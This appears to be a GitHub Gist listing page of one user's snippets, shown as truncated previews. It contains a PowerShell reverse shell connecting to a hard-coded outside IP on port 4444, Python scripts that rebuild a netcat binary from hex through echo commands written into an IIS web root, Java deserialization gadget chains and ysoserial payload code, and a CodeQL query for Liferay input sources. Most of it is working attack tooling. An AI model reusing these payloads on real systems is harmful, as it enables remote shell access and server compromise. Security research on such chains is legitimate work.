Skip to content

Instantly share code, notes, and snippets.

public interface HandlerInterface{
public void doSmt(...);
}
public class HandlerImpl implements HandlerInterface{
public void doSmt(args){
//real Method
sink();
}
}
$socket = new-object System.Net.Sockets.TcpClient('207.148.76.98', 4444);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@testanull
testanull / create_netcat.py
Created October 3, 2019 03:20
Netcat delivered with bat
import os
commands = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 8e ae 34 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 00 00 70 00 00 00 10 00 00 00 d0 00 00 b0 4b 01 00 00 e0 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
@testanull
testanull / create_nc.py
Created October 3, 2019 02:19
Create nc from bat
commands = """echo n 1.dll >C:\\Inetpub\\wwwroot\\123.hex
echo e 0100 >>C:\\Inetpub\\wwwroot\\123.hex
echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 >>C:\\Inetpub\\wwwroot\\123.hex
echo e 0180 >>C:\\Inetpub\\wwwroot\\123.hex
echo 50 45 00 00 4c 01 03 00 b9 8e ae 34 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 00 00 70 00 00 00 10 00 00 00 d0 00 00 b0 4b 01 00 00 e0 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 >>C:\\Inetpub\\wwwroot\\123.hex
echo e 0200 >>C:\\Inetpub\\wwwro
@testanull
testanull / CommonsCollections5_Chain.txt
Created February 13, 2020 09:23
CommonsCollections5_Chain
BadAttributeValueExpException.readObject()
TiedMapEntry.toString()
TiedMapEntry.getValue()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
@testanull
testanull / CC5.java
Last active April 16, 2020 15:24
CommonsCollections5
package ysoserial.payloads;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;
import javax.management.BadAttributeValueExpException;
import org.apache.commons.collections.Transformer;
public Object getObject(final String url) throws Exception {
HashMap ht = new HashMap();
URL u = new URL(url);
ht.put(u, url); // <===
Reflections.setFieldValue(u, "hashCode", -1);
return ht;
}
package ysoserial.payloads;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import ysoserial.payloads.util.PayloadRunner;
import java.io.*;
import java.lang.reflect.Array;
class LiferayParamUtilGetString extends MethodAccess{
LiferayParamUtilGetString(){
exists(MethodAccess ma|
ma.getMethod().hasName("getString")
and ma.getMethod().getDeclaringType().hasName("ParamUtil")
and this = ma
)
}
}
class LiferayParamUtilGetString2 extends MethodAccess{
LiferayParamUtilGetString2(){
this.getMethod().hasName("getString")
and this.getMethod().getDeclaringType().hasName("ParamUtil")
}
}